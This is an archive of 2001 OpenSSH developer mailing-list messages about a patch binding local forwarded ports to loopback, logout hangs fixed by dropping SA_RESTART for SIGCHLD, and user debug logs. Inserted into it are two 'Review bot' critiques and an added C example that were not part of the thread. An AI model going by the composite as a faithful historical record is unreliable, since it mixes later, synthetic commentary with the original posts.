@@ -1815,13 +1815,25 @@ /* * getaddrinfo returns a loopback address if the hostname is * set to NULL and hints.ai_flags is not AI_PASSIVE + * + * Oh yeah? Setting hostname to NULL and hints.ai_flags to + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with + * Linux kernel 2.2.14 does no such thing. On that system + * "::" and "0.0.0.0" (and maybe one other value which slips + * my memory) are returned. Setting hostname to "127.0.0.1" + * does the trick, at least for IPv4 uses; I don't know what + * it does for IPv6. Without this hack, local ("-L") tunnel + * end-points (which are supposed to be private unless "-g" + * or "-o 'GatewayPorts yes'" is specified when "ssh" is + * started) are [ab]usable by any host which has a route + * to/from the this host. */ memset(&hints, 0, sizeof(hints)); hints.ai_family = IPv4or6; hints.ai_flags = gateway_ports ? AI_PASSIVE : 0; hints.ai_socktype = SOCK_STREAM; snprintf(strport, sizeof strport, "%d", listen_port); - if (getaddrinfo(NULL, strport, &hints, &aitop) != 0) + if (getaddrinfo(gateway_ports ? NULL : "127.0.0.1", strport, &hints, &aitop) != 0) packet_disconnect("getaddrinfo: fatal error"); for (ai = aitop; ai; ai = ai->ai_next) { From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 17:56:34 2001 
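Review bot: the comment block added above the `getaddrinfo()` call argues about the wrong case. It reports what `NULL` plus `AI_PASSIVE` returns on Red Hat 6.0, but the line the hunk changes is the `gateway_ports == 0` path, where `hints.ai_flags` is 0 and RFC 2553 already specifies a loopback address for a `NULL` node name; `"::"` and `"0.0.0.0"` are the correct, intended results for the `AI_PASSIVE` case that `GatewayPorts yes` selects. Hard-coding `"127.0.0.1"` also silently drops the IPv6 loopback listener that the `IPv4or6` family hint would otherwise yield, so IPv6-only clients on the same host lose the forward. Before merging, reproduce the non-`AI_PASSIVE` call on the affected libc; if it really returns a wildcard address there, the workaround should say so in the comment and iterate `"127.0.0.1"` and `"::1"` with `AI_NUMERICHOST` rather than replace the standard call unconditionally.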
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Thu, 7 Jun 2001 09:56:34 +0200
Subject: SSH connection hanging on logout
In-Reply-To: ; from tim@multitalents.net on Wed, Jun 06, 2001 at 08:52:26PM -0700
References: <20010511005244.A16114@faui02.informatik.uni-erlangen.de>
Message-ID: <20010607095634.B2968@faui02.informatik.uni-erlangen.de>

On Wed, Jun 06, 2001 at 08:52:26PM -0700, Tim Rice wrote:
> > please, could someone with a system where:
> >     $ ssh -t host
> >     % sleep 1234 &
> >     % exit
> >     $
> > hangs with openssh try whether rlogin hangs, too?
>
> Platform              SSH hangs    Rlogin hangs
> Solaris 7             Y            N
> UnixWare 2.03         Y            N
> UnixWare 2.13         Y            N
> UnixWare 7.1.0        Y            N
> SCO Open Server 3     Y            N
> SCO Open Server 5     Y            N
> Redhat 6.2            Y            N
> Caldera eServer 2.3   Y            N
>
> Hmm, I've got source to Linux.
>
> > if rlogin does not hang, could you please check the source of rlogin
> > and try to figure out how it handles the filedescriptors that connect
> > rlogind to the shell. what happens with the filedescriptors after the
> > shell dies?
>
> Nothing is jumping out at me. If you'd like to see for yourself,
> ftp://ftp.multitalents.net/pub/netkit-rsh-0.10.tgz (~50K)
> has rlogin/rlogind source in it.

sorry, i don't have the time to check linux/sco/solaris.
(check behaviour on SIGCLD, pty handling, etc).

however:

Platform              SSH hangs    Rlogin hangs
OpenBSD               N            N
BSD/OS                N            N

this is all i can do right now.

-m

From dbt at meat.net Thu Jun 7 18:53:11 2001
From: dbt at meat.net (David Terrell)
Date: Thu, 7 Jun 2001 01:53:11 -0700
Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1
In-Reply-To: ; from ajf_nylorac@acm.org on Sat, Jun 09, 2001 at 07:48:06PM -0400
References:
Message-ID: <20010607015311.A13215@pianosa.catch22.org>

On Sat, Jun 09, 2001 at 07:48:06PM -0400, Albert John FitzPatrick III wrote:
> + * Oh yeah? Setting hostname to NULL and hints.ai_flags to
> + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with
> + * Linux kernel 2.2.14 does no such thing. On that system
> + * "::" and "0.0.0.0" (and maybe one other value which slips
> + * my memory) are returned. Setting hostname to "127.0.0.1"
> + * does the trick, at least for IPv4 uses; I don't know what
> + * it does for IPv6. Without this hack, local ("-L") tunnel
> + * end-points (which are supposed to be private unless "-g"
> + * or "-o 'GatewayPorts yes'" is specified when "ssh" is
> + * started) are [ab]usable by any host which has a route
> + * to/from the this host.

Perhaps you should point your operating system vendor (or whomever they
get their libc from) at RFC 2553:

   If the AI_PASSIVE bit is not set in the ai_flags member of the hints
   structure, then the returned socket address structure will be ready
   for a call to connect() (for a connection-oriented protocol) or
   either connect(), sendto(), or sendmsg() (for a connectionless
   protocol). In this case, if the nodename argument is a NULL pointer,
   then the IP address portion of the socket address structure will be
   set to the loopback address.

--
David Terrell            | "... a grandiose, wasteful drug war that will never
dbt at meat.net          | be won as long as so many Americans need to
Nebcorp Prime Minister   | anesthetize themselves to get through the day."
http://wwn.nebcorp.com/  |   -Camille Paglia

From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 19:20:21 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Thu, 7 Jun 2001 11:20:21 +0200 Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1 In-Reply-To: ; from ajf_nylorac@acm.org on Sat, Jun 09, 2001 at 07:48:06PM -0400 References: Message-ID: <20010607112021.A5965@faui02.informatik.uni-erlangen.de> can anyone confirm this broken linux behaviour? On Sat, Jun 09, 2001 at 07:48:06PM -0400, Albert John FitzPatrick III wrote: > diff -u -r -N openssh-2.9p1/channels.c openssh-2.9p1-ajf.1/channels.c > --- openssh-2.9p1/channels.c Tue Apr 17 14:14:35 2001 > +++ openssh-2.9p1-ajf.1/channels.c Wed Jun 6 23:25:36 2001 > @@ -1815,13 +1815,25 @@ > /* > * getaddrinfo returns a loopback address if the hostname is > * set to NULL and hints.ai_flags is not AI_PASSIVE > + * > + * Oh yeah? Setting hostname to NULL and hints.ai_flags to > + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with > + * Linux kernel 2.2.14 does no such thing. On that system > + * "::" and "0.0.0.0" (and maybe one other value which slips > + * my memory) are returned. Setting hostname to "127.0.0.1" > + * does the trick, at least for IPv4 uses; I don't know what > + * it does for IPv6. Without this hack, local ("-L") tunnel > + * end-points (which are supposed to be private unless "-g" > + * or "-o 'GatewayPorts yes'" is specified when "ssh" is > + * started) are [ab]usable by any host which has a route > + * to/from the this host. > */ > memset(&hints, 0, sizeof(hints)); > hints.ai_family = IPv4or6; > hints.ai_flags = gateway_ports ? AI_PASSIVE : 0; > hints.ai_socktype = SOCK_STREAM; > snprintf(strport, sizeof strport, "%d", listen_port); > - if (getaddrinfo(NULL, strport, &hints, &aitop) != 0) > + if (getaddrinfo(gateway_ports ? NULL : "127.0.0.1", strport, &hints, &aitop) != 0) > packet_disconnect("getaddrinfo: fatal error"); > > for (ai = aitop; ai; ai = ai->ai_next) { > > From dominic.scott at actfs.co.uk Thu Jun 7 18:49:23 2001 
From: dominic.scott at actfs.co.uk (Dominic Scott)
Date: Thu, 7 Jun 2001 09:49:23 +0100
Subject: sshd failing to allow connections.
Message-ID: <005b01c0ef2e$c056c520$255b100a@actfs.co.uk>

Hi Guys,

On my Slackware-current firewall I cannot ssh into it. The tail of the
syslog is :-

Jun 1 10:56:15 firefly sshd[22176]: fatal: get_sock_port: getnameinfo NI_NUMERICSERV failed

any ideas why I get this error? Although slack-current includes openssh
I've actually built this one from source ( and openssl too ) in case it
was a config issue with the slackware -current release (which is FYI
actually the very latest stuff - i.e. what will be in the next release of
Slackware ).

Also I note :-

Jun 1 10:57:17 firefly inetd[73]: netbios-ns/udp server failing (looping), service terminated

any ideas what's causing this. AFAIK everything else that I want is
working fine.

Dom.

From openssh-unix-dev at thewrittenword.com Thu Jun 7 21:12:06 2001
From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com)
Date: Thu, 7 Jun 2001 06:12:06 -0500
Subject: HPUX: ssh hangs after shell exit
In-Reply-To: <3B1D4F85.FEF10A43@mail.microcenter.com>; from abush@microcenter.com on Tue, Jun 05, 2001 at 05:30:45PM -0400
References: <3B1D4F85.FEF10A43@mail.microcenter.com>
Message-ID: <20010607061206.I14017@postal.il.thewrittenword.com>

On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote:
> I am aware that there have been several posts related to ssh connections
> hanging, i have tried to read through most of them in the archives... I
> am posting this in hopes that it may present something new that will
> further help resolve this problem.
>
> The problem i am having appears to be similar to what others have
> reported where after typing exit in an interactive shell the connection
> is not closed until an additional _one_ key stroke is issued (space-bar,
> enter, etc...).
>
> The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting
> using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and
> FreeBSD-4.2. The behavior so far is _always_ consistent:

We have *no* problems with 2.9p1 on HP-UX 11.00 here. We do use the HP
commercial C compiler to build it.

--
albert chin (china at thewrittenword.com)

From openssh-unix-dev at thewrittenword.com Thu Jun 7 21:14:54 2001
From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com)
Date: Thu, 7 Jun 2001 06:14:54 -0500
Subject: Unreviewed 2.9p1 patches?
Message-ID: <20010607061453.J14017@postal.il.thewrittenword.com>

Anyone get a chance to review the patches we submitted?
http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=99041860215437&w=2

--
albert chin (china at thewrittenword.com)

From nico at sonycom.com Thu Jun 7 21:53:46 2001
From: nico at sonycom.com (Nico De Ranter)
Date: Thu, 7 Jun 2001 13:53:46 +0200
Subject: Bugreport?: TCP/IP forwarding problem (openssh 2.9p1)
Message-ID: <20010607135346.I12366@immortelle.sonytel.be>

Hi,

I have a user who is trying to use SAP through SSH. SAP uses 2 ports:
3202 and 3602. This used to work with version 2.3.0p1 of openssh,
however with version 2.9p1 a connection is initiated on one of the ports
but when the connection on the second port is set up the SAP client
hangs and no traffic is seen on the network. Only 1 out of 5 connection
attempts seems to get through. When I start the 2.3.0p1 server again
instead of 2.9p1 everything works fine.

The SSH client is TeraTerm Pro 2.3 with TTSSH 1.5.1. The server side
runs Solaris 2.6 with openssl 0.9.6a and openssh 2.3.0p1 or 2.9p1.

Any idea what might be wrong?

Nico

---------------------------------------------------------
"It has been said that there are only two businesses that
refer to customers as users: illegal drug trade and the
computer industry."
---------------------------------------------------------
Nico De Ranter
Sony Service Center (SDCE/NEE-B)
Sint Stevens Woluwestraat 55 (Rue de Woluwe-Saint-Etienne)
1130 Brussel (Bruxelles), Belgium, Europe, Earth
Telephone: +32 2 724 86 41
Telefax: +32 2 726 26 86
e-mail: nico.deranter at sonycom.com

From Markus.Friedl at informatik.uni-erlangen.de Thu Jun 7 21:34:26 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Thu, 7 Jun 2001 13:34:26 +0200
Subject: HPUX: ssh hangs after shell exit
In-Reply-To: <3B1D4F85.FEF10A43@mail.microcenter.com>; from abush@microcenter.com on Tue, Jun 05, 2001 at 05:30:45PM -0400
References: <3B1D4F85.FEF10A43@mail.microcenter.com>
Message-ID: <20010607133426.A19581@faui02.informatik.uni-erlangen.de>

On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote:
> 1) establish connection to sshd using ssh simply via "ssh remote-host"
> 2) type exit in interactive shell on remote-host.
> 3) "logout" is echoed to the terminal and the local shell prompt is NOT
> echoed.
> 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS
> HERE
> 5) "Connection to remote-host closed." is echoed to the terminal
> followed by the local shell prompt.

do you have
    ssh -v -v -v remote-host
traces?

From davidoliveira at universoproactiva.com Thu Jun 7 22:06:58 2001
From: davidoliveira at universoproactiva.com (David Oliveira)
Date: Thu, 07 Jun 2001 12:06:58 +0000
Subject: authentication has failed
Message-ID: <3B1F6E62.5080602@universoproactiva.com>

Dear sirs,

I am trying to install opensshd on my linux slackware 7.1.
I just decompressed the openssh tar gzipped file and ran
./configure --sysconfdir=/etc/ssh ;make;make install
ok!
sshd to put the ssh daemon running in memory
and I try to connect to myself (ssh -l username 127.0.0.1)
I put my password but it fails! why?
am I doing something wrong??

thank you

David Oliveira
davidoliveira at universoproactiva.com

From jason at dour.org Thu Jun 7 23:23:35 2001
From: jason at dour.org (Jason A . Dour)
Date: Thu, 7 Jun 2001 09:23:35 -0400
Subject: HPUX: ssh hangs after shell exit
In-Reply-To: <20010607133426.A19581@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Thu, Jun 07, 2001 at 01:34:26PM +0200
References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607133426.A19581@faui02.informatik.uni-erlangen.de>
Message-ID: <20010607092335.D17159@dour.org>

On Thu, Jun 07, 2001 at 01:34:26PM +0200, Markus Friedl wrote:
> On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote:
> > 1) establish connection to sshd using ssh simply via "ssh remote-host"
> > 2) type exit in interactive shell on remote-host.
> > 3) "logout" is echoed to the terminal and the local shell prompt is NOT
> > echoed.
> > 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS
> > HERE
> > 5) "Connection to remote-host closed." is echoed to the terminal
> > followed by the local shell prompt.
>
> do you have
>     ssh -v -v -v remote-host
> traces?

I have HP/UX 11.00 installed on my machines at work, and I recently began
deploying OpenSSH to them. I compiled it on our Development machine, and
deployed it via tar/ftp to other machines. Our Devel machine does not
exhibit the hang. However, our secondary development machine DOES exhibit
the hang. Both of them have the same OS and patch-level as far as I can
tell. Here's the debug output for the close of the sessions.
FROM C3P0 TO DEVEL -- NO HANG:

> ^[[1m-- jdour at devel (1/0) -- ~ --^[[0m^M^M
> ^[[1m-:^[[0m logout^M
> Logging out.^M
> debug1: channel 0: rcvd eof^M
> debug1: channel 0: output open -> drain^M
> debug1: client_input_channel_req: channel 0 rtype exit-status reply 0^M
> debug1: channel 0: rcvd close^M
> debug1: channel 0: input open -> closed^M
> debug1: channel 0: close_read^M
> debug2: channel 0: no data after CLOSE^M
> debug1: channel 0: obuf empty^M
> debug1: channel 0: output drain -> closed^M
> debug1: channel 0: close_write^M
> debug1: channel 0: send close^M
> debug1: channel 0: is dead^M
> debug1: channel_free: channel 0: status: The following connections are open:^M
>   #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1)^M
> ^M
> debug1: channel_free: channel 0: dettaching channel user^M
> Connection to devel closed.^M^M
> debug1: Transferred: stdin 0, stdout 0, stderr 29 bytes in 3.2 seconds^M^M
> debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 9.1^M^M
> debug1: Exit status 0^M^M
> debug1: writing PRNG seed to file /home/jdour/.ssh/prng_seed^M^M
> ^[[1m-- jdour at c3p0 (ttyp1/0) -- ~ --^[[0m^M^M
> ^[[1m-:^[[0m exit^M

FROM DEVEL TO C3P0 -- WITH HANG:

> ^[[1m-- jdour at c3p0 (0/0) -- ~ --^[[0m^M^M
> ^[[1m-:^[[0m logout^M
> Logging out.^M
> debug1: channel 0: rcvd eof^M
> debug1: channel 0: output open -> drain^M
> debug1: channel 0: obuf empty^M
> debug1: channel 0: output drain -> closed^M
> debug1: channel 0: close_write^M        <##### HANG OCCURS HERE!
> debug1: client_input_channel_req: channel 0 rtype exit-status reply 0^M
> debug1: channel 0: rcvd close^M
> debug1: channel 0: input open -> closed^M
> debug1: channel 0: close_read^M
> debug2: channel 0: no data after CLOSE^M
> debug1: channel 0: send close^M
> debug1: channel 0: is dead^M
> debug1: channel_free: channel 0: status: The following connections are open:^M
>   #0 client-session (t4 r0 i8/0 o128/0 fd -1/-1)^M
> ^M
> debug1: channel_free: channel 0: dettaching channel user^M
> Connection to c3p0 closed.^M^M
> debug1: Transferred: stdin 0, stdout 0, stderr 28 bytes in 9.4 seconds^M^M
> debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 3.0^M^M
> debug1: Exit status 0^M^M
> debug1: writing PRNG seed to file /home/jdour/.ssh/prng_seed^M^M
> ^[[1m-- jdour at devel (ttyp1/0) -- ~ --^[[0m^M^M
> ^[[1m-:^[[0m di^[[D ^[[D^[[D ^[[Dexit^M

That's what I have... Any suggestions?

Cheers,
Jason

# "Jason A. Dour"                                 http://dour.org/
# Founder / Executive Producer - PJ Harvey Online - http://pjh.org/

From wooledg at eeg.ccf.org Thu Jun 7 23:28:32 2001
From: wooledg at eeg.ccf.org (Greg Wooledge)
Date: Thu, 7 Jun 2001 09:28:32 -0400
Subject: Defect: OpenSSH hangs on logout
In-Reply-To: ; from stevesk@pobox.com on Wed, Jun 06, 2001 at 02:16:13PM -0700
References: <20010606082224.C24958@eeg.ccf.org>
Message-ID: <20010607092831.D24958@eeg.ccf.org>

On Wed, Jun 06, 2001 at 02:16:13PM -0700, Kevin Steves wrote:
> does 10.20 hang with 2.9 without the patch? with the patch?

It hangs both with and without the patch. Every time. (It certainly
doesn't act like a race condition, as someone else mentioned.)

Just to refresh memories, this is the symptom:

box1$ ssh somewhere
somewhere$ sleep 500 &
somewhere$ logout
(hangs)

Then, if I kill the sleep process in another window, the connection is
immediately terminated and everything is back to normal.

Using "nohup sleep 500 >/dev/null 2>&1 &" does the same thing. Using
bash2's "disown" command doesn't help, either.

From kaukasoi at elektroni.ee.tut.fi Fri Jun 8 00:27:06 2001
From: kaukasoi at elektroni.ee.tut.fi (Petri Kaukasoina)
Date: Thu, 7 Jun 2001 17:27:06 +0300
Subject: Defect: OpenSSH hangs on logout
In-Reply-To: <20010607092831.D24958@eeg.ccf.org>; from wooledg@eeg.ccf.org on Thu, Jun 07, 2001 at 09:28:32AM -0400
References: <20010606082224.C24958@eeg.ccf.org> <20010607092831.D24958@eeg.ccf.org>
Message-ID: <20010607172706.A20234@elektroni.ee.tut.fi>

On Thu, Jun 07, 2001 at 09:28:32AM -0400, Greg Wooledge wrote:
> Using "nohup sleep 500 >/dev/null 2>&1 &" does the same thing.

How about these:

nohup sleep 500 >/dev/null 2>&1 &- 2>&- <&- &

From cmadams at hiwaay.net Fri Jun 8 00:35:48 2001
From: cmadams at hiwaay.net (Chris Adams) Date: Thu, 7 Jun 2001 09:35:48 -0500 Subject: [PATCH] Make "-L" local ports bind to "127.0.0.1" in openssh-2.9p1 In-Reply-To: <20010607015311.A13215@pianosa.catch22.org>; from dbt@meat.net on Thu, Jun 07, 2001 at 01:53:11AM -0700 References: <20010607015311.A13215@pianosa.catch22.org> Message-ID: <20010607093548.C17961@HiWAAY.net> Once upon a time, David Terrell said: > On Sat, Jun 09, 2001 at 07:48:06PM -0400, Albert John FitzPatrick III wrote: > > + * Oh yeah? Setting hostname to NULL and hints.ai_flags to > > + * AI_PASSIVE on Red Hat Linux release 6.0 (Hedwig) with > > + * Linux kernel 2.2.14 does no such thing. On that system > > + * "::" and "0.0.0.0" (and maybe one other value which slips > > + * my memory) are returned. Setting hostname to "127.0.0.1" > > + * does the trick, at least for IPv4 uses; I don't know what > > + * it does for IPv6. Without this hack, local ("-L") tunnel > > + * end-points (which are supposed to be private unless "-g" > > + * or "-o 'GatewayPorts yes'" is specified when "ssh" is > > + * started) are [ab]usable by any host which has a route > > + * to/from the this host. > > Perhaps you should point your operating system vendor (or whomever they > get their libc from) at RFC 2553: > > If the AI_PASSIVE bit is not set in the ai_flags member of the hints > structure, then the returned socket address structure will be ready > for a call to connect() (for a connection-oriented protocol) or > either connect(), sendto(), or sendmsg() (for a connectionless > protocol). In this case, if the nodename argument is a NULL pointer, > then the IP address portion of the socket address structure will be > set to the loopback address. What you quoted is the opposite case of what the original patch changes. The patch changes behaviour if AI_PASSIVE _is_ set. 
According to the man page for getaddrinfo, if AI_PASSIVE is set and the node is NULL, "the network address in each socket structure will be left unspecified." The quoted comment is also misleading, as it is in response to the following comment that you snipped: * getaddrinfo returns a loopback address if the hostname is * set to NULL and hints.ai_flags is not AI_PASSIVE So the "does no such thing" part of the comment is incorrect because it is describing a different case. Looking at the patch, if it changes anything, then something is broken on the original poster's computer. The original code sets AI_PASSIVE only if gateway_ports is set, and then calls getaddrinfo with the node NULL. The new code changes the getaddrinfo to only get NULL when gateway_ports is set (and AI_PASSIVE is set). I just tested local port forwarding with Red Hat 7.1 and the OpenSSH RPMs from ftp.OpenBSD.org, and I do NOT see any problem (when I use -L, the port forwardings only work for localhost unless I also use "-o GatewayPorts=yes"). -- Chris Adams Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble. From abush at microcenter.com Thu Jun 7 23:57:48 2001 
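An added example (not from the thread and not OpenSSH code) that exercises the getaddrinfo() case Chris describes: node NULL, AI_PASSIVE set only when GatewayPorts is on, followed by the loopback check a cautious caller would make before binding a -L listener. listener_bind_address(), is_private_listener() and listener_is_private() are names chosen here; the lookup is IPv4-only and uses the numeric service "0", so no resolver or network access is needed.

```c
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

/* Mirror the original channels.c logic as described in the thread: node is
 * NULL and AI_PASSIVE is set only when GatewayPorts is on.  The first IPv4
 * result is written as text into out.  Returns 0 on success, -1 on failure. */
int listener_bind_address(int gateway_ports, char *out, size_t outlen)
{
    struct addrinfo hints, *res = NULL;
    struct sockaddr_in *sin;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET;          /* IPv4 only, to keep the output simple */
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_flags = gateway_ports ? AI_PASSIVE : 0;

    /* service "0" is numeric, so no resolver or network access is needed */
    if (getaddrinfo(NULL, "0", &hints, &res) != 0 || res == NULL)
        return -1;
    sin = (struct sockaddr_in *)res->ai_addr;
    if (inet_ntop(AF_INET, &sin->sin_addr, out, (socklen_t)outlen) == NULL) {
        freeaddrinfo(res);
        return -1;
    }
    freeaddrinfo(res);
    return 0;
}

/* A libc that follows RFC 2553 answers 127.0.0.1 without AI_PASSIVE and the
 * wildcard 0.0.0.0 with it.  This is the check a defensive caller adds:
 * a listener that is supposed to be private must be on loopback.
 * Returns 1 if addr is 127.0.0.1, else 0. */
int is_private_listener(const char *addr)
{
    return strcmp(addr, "127.0.0.1") == 0;
}

/* Yes/no form for callers: 1 if the listener would be loopback-only,
 * 0 if it would be reachable from other hosts, -1 if the lookup failed. */
int listener_is_private(int gateway_ports)
{
    char addr[INET_ADDRSTRLEN];

    if (listener_bind_address(gateway_ports, addr, sizeof(addr)) != 0)
        return -1;
    return is_private_listener(addr);
}

int main(void)
{
    char addr[INET_ADDRSTRLEN];
    int gw;

    for (gw = 0; gw <= 1; gw++) {
        if (listener_bind_address(gw, addr, sizeof(addr)) != 0) {
            printf("GatewayPorts=%s: getaddrinfo failed\n", gw ? "yes" : "no");
            continue;
        }
        printf("GatewayPorts=%s -> bind %s (%s)\n", gw ? "yes" : "no", addr,
               is_private_listener(addr) ? "private" : "reachable from other hosts");
    }
    return 0;
}
```

A libc with the behaviour the original poster reported would print 0.0.0.0 for both rows, which is exactly what the loopback check is there to catch.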
From: abush at microcenter.com (Aaron Bush) Date: Thu, 07 Jun 2001 09:57:48 -0400 Subject: HPUX: ssh hangs after shell exit References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607061206.I14017@postal.il.thewrittenword.com> Message-ID: <3B1F885C.92328A94@mail.microcenter.com> openssh-unix-dev at thewrittenword.com wrote: > > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > I am aware that there have been several posts related to ssh connections > > hanging, i have tried to read through most of them in the archives... I > > am posting this in hopes that it may present something new that will > > further help resolve this problem. > > > > The problem i am having appears to be similar to what others have > > reported where after typing exit in an interactive shell the connection > > is not closed until an additional _one_ key stroke is issued (space-bar, > > enter, etc...). > > > > The sshd server is OpenSSH_2.9p1 on HPUX-11.00. I have tried connecting > > using the OpenSSH_2.9p1 ssh client from Linux-2.4, HPUX-11.00 and > > FreeBSD-4.2. The behavior so far is _always_ consistent: > > We have *no* problems with 2.9p1 on HP-UX 11.00 here. We do use the HP > commercial C compiler to build it. > > -- > albert chin (china at thewrittenword.com) I am using gcc 2.95.2 and the problem does exist. I have not tried the HP ANSI C compiler though. -ab From abush at microcenter.com Fri Jun 8 00:04:03 2001 
From: abush at microcenter.com (Aaron Bush) Date: Thu, 07 Jun 2001 10:04:03 -0400 Subject: HPUX: ssh hangs after shell exit References: Message-ID: <3B1F89D3.6598D9@mail.microcenter.com> Kevin Steves wrote: > can you try the patch at the end? hp-ux (and possibly the other systems > you mentioned) restart select() when SA_RESTART which we were setting for > SIGCHLD, and we should not have select() restarted. > > > Index: misc.c > =================================================================== > RCS file: /var/cvs/openssh/misc.c,v > retrieving revision 1.20 > diff -u -r1.20 misc.c > --- misc.c 2001/05/12 00:08:38 1.20 > +++ misc.c 2001/06/05 20:55:54 > @@ -220,7 +220,7 @@ > memset(&sa, 0, sizeof(sa)); > sigemptyset(&sa.sa_mask); > sa.sa_flags = 0; > -#if defined(SA_RESTART) > +#if 0 > if (sig == SIGCHLD) > sa.sa_flags |= SA_RESTART; > #endif Sorry for the delay in response... This patch has corrected the problems i have been having. I have been looking for documentation from HP regarding the behavior of SA_RESTART and have found nothing so far. Thanks, -ab From abush at microcenter.com Fri Jun 8 00:06:31 2001 
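Review bot: turning `#if defined(SA_RESTART)` into `#if 0` leaves the `if (sig == SIGCHLD) sa.sa_flags |= SA_RESTART;` block in misc.c as dead code with nothing saying why it was disabled, and `sa.sa_flags = 0;` two lines above already gives the intended result. Delete the block outright and replace it with a one-line comment stating that SA_RESTART is deliberately not set for SIGCHLD because some systems restart select() and the child's exit would then not be noticed until the next input arrives; that keeps the next reader from "fixing" it back.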
From: abush at microcenter.com (Aaron Bush) Date: Thu, 07 Jun 2001 10:06:31 -0400 Subject: HPUX: ssh hangs after shell exit References: <3B1D4F85.FEF10A43@mail.microcenter.com> <20010607133426.A19581@faui02.informatik.uni-erlangen.de> Message-ID: <3B1F8A67.548EFBE@mail.microcenter.com> Markus Friedl wrote: > > On Tue, Jun 05, 2001 at 05:30:45PM -0400, Aaron Bush wrote: > > 1) establish connection to sshd using ssh simply via "ssh remote-host" > > 2) type exit in interactive shell on remote-host. > > 3) "logout" is echoed to the terminal and the local shell prompt is NOT > > echoed. > > 4) type any other key, usually i just hit the space-bar. <<--PROBLEM IS > > HERE > > 5) "Connection to remote-host closed." is echoed to the terminal > > followed by the local shell prompt. > > do you have > ssh -v -v -v remote-host > traces? Sure here is the debug to a HPUX 11.00 host that is still setting SA_RESTART: OpenSSH_2.9p1, SSH protocols 1.5/2.0, OpenSSL 0x0090600f debug1: Reading configuration data /home/abush/.ssh/config debug1: Applying options for * debug1: Reading configuration data /etc/ssh/ssh_config debug1: Seeding random number generator debug1: Rhosts Authentication disabled, originating port will not be trusted. debug1: restore_uid debug1: ssh_connect: getuid 500 geteuid 0 anon 1 debug1: Connecting to k200 [10.10.1.10] port 22. debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug1: Connection established. debug1: read PEM private key done: type DSA debug1: read PEM private key done: type RSA debug1: identity file /home/abush/.ssh/identity type -1 debug1: identity file /home/abush/.ssh/id_rsa type -1 debug3: No RSA1 key file /home/abush/.ssh/id_dsa. 
debug2: key_type_from_name: unknown key type '-----BEGIN' debug3: key_read: no key found debug2: key_type_from_name: unknown key type 'Proc-Type:' debug3: key_read: no key found debug2: key_type_from_name: unknown key type 'DEK-Info:' debug3: key_read: no key found debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug3: key_read: no space debug2: key_type_from_name: unknown key type '-----END' debug3: key_read: no key found debug1: identity file /home/abush/.ssh/id_dsa type 2 debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p1 debug1: match: OpenSSH_2.9p1 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: 
